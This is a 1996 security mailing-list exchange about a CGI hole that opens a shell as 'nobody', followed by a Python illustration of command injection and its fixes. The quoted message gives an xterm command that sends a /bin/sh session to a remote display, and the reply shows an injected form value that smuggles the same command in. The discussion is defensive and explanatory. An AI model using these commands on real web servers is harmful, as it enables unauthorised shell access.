[3672] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (John Stewart)
Tue Dec 3 20:17:30 1996
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-reply-to: Your message of "Tue, 03 Dec 1996 11:46:21 EST."
<Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Date: Tue, 03 Dec 1996 14:56:48 -0800
From: John Stewart <jns@cisco.com>
Errors-To: owner-www-security@ns2.rutgers.edu
->
-> I was experimenting with cgi scripts when I came up with this idea:
->
-> What if I have a cgi script which does the following:
-> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
->
-> I can now pop an xterm on my display as nobody.
-> This way any user can gain access to the nobody account and
-> have fun with it...
->
-> Has this been discussed anywhere?
-> Is there a fix out there?
Other than checking which CGI programs are written onto your server?
My thoughts:
1. Block outbound X; clearly not for everybody and really only stops
one port (which can be worked around)
2. Don't have X/Openwindows/HPVue software on your Web server. We've
done that here for this very reason.
3. Audit.
The thing is, with poorly written CGI programs, you could send:
John Stewart; /usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&"
and have the same effect. It comes down to programming...
--john
John Stewart (jns@cisco.com) | | Phone: +1.408.526.8499
Advanced Customer Systems ||| ||| FAX: +1.408.232.2399
Cisco Systems, Inc. .:|||||:..:|||||:. http://www.employees.org/~jns
Friends of Randal Schwartz: http://www.lightlink.com/fors/
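The injection John describes (a form field such as "John Stewart; xterm ..." handed to system()) relies entirely on /bin/sh parsing the attacker's string. The following is an added illustration, not code from either poster: it shows a CGI-style lookup written the vulnerable way beside two hardened forms, an argument-vector call with an allow-list check and, for cases where a shell is unavoidable, shlex.quote. The command is a harmless echo rather than xterm so it runs offline; the field value and the function names are constructed for this example.

```python
import re
import shlex
import subprocess

# Constructed attacker-supplied form field, modelled on the
# "John Stewart; /usr/local/X11R6/bin/xterm ..." line in the reply above.
# The payload after ';' is a harmless echo so this runs safely anywhere.
INJECTED_NAME = "John Stewart; echo INJECTED-COMMAND-RAN"
BENIGN_NAME = "John Stewart"


def vulnerable_lookup(name):
    """Mirrors system("... $name") in a 1996 CGI: the whole string is handed
    to /bin/sh, so ';' ends the intended command and starts the attacker's."""
    cmd = "echo Looking up " + name
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_lookup(name):
    """Argument-vector form: no shell ever sees the input, so metacharacters
    are ordinary bytes. An allow-list rejects anything a name never needs."""
    if not re.fullmatch(r"[A-Za-z0-9 ._-]{1,64}", name):
        raise ValueError("rejected input: %r" % name)
    argv = ["echo", "Looking up", name]
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout


def quoted_lookup(name):
    """If a shell is unavoidable, quote the value so sh treats it as one word.
    The ';' survives only as literal text inside the single-quoted argument."""
    cmd = "echo Looking up " + shlex.quote(name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def injection_succeeded(output):
    """True when the attacker's second command actually ran (its marker is on
    its own line), as opposed to merely being echoed back as text."""
    return "INJECTED-COMMAND-RAN" in output.splitlines()


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_lookup(INJECTED_NAME)))
    print("quoted:    ", repr(quoted_lookup(INJECTED_NAME)))
    try:
        hardened_lookup(INJECTED_NAME)
    except ValueError as e:
        print("hardened:  ", e)
```

Run against INJECTED_NAME, vulnerable_lookup prints the marker on its own line because sh executed a second command; quoted_lookup echoes the whole string back as data; hardened_lookup refuses the input before any process is spawned. The argv form is the one to prefer: it removes the shell from the path entirely, which is the same point the reply makes about outbound X filtering being a workaround rather than a fix.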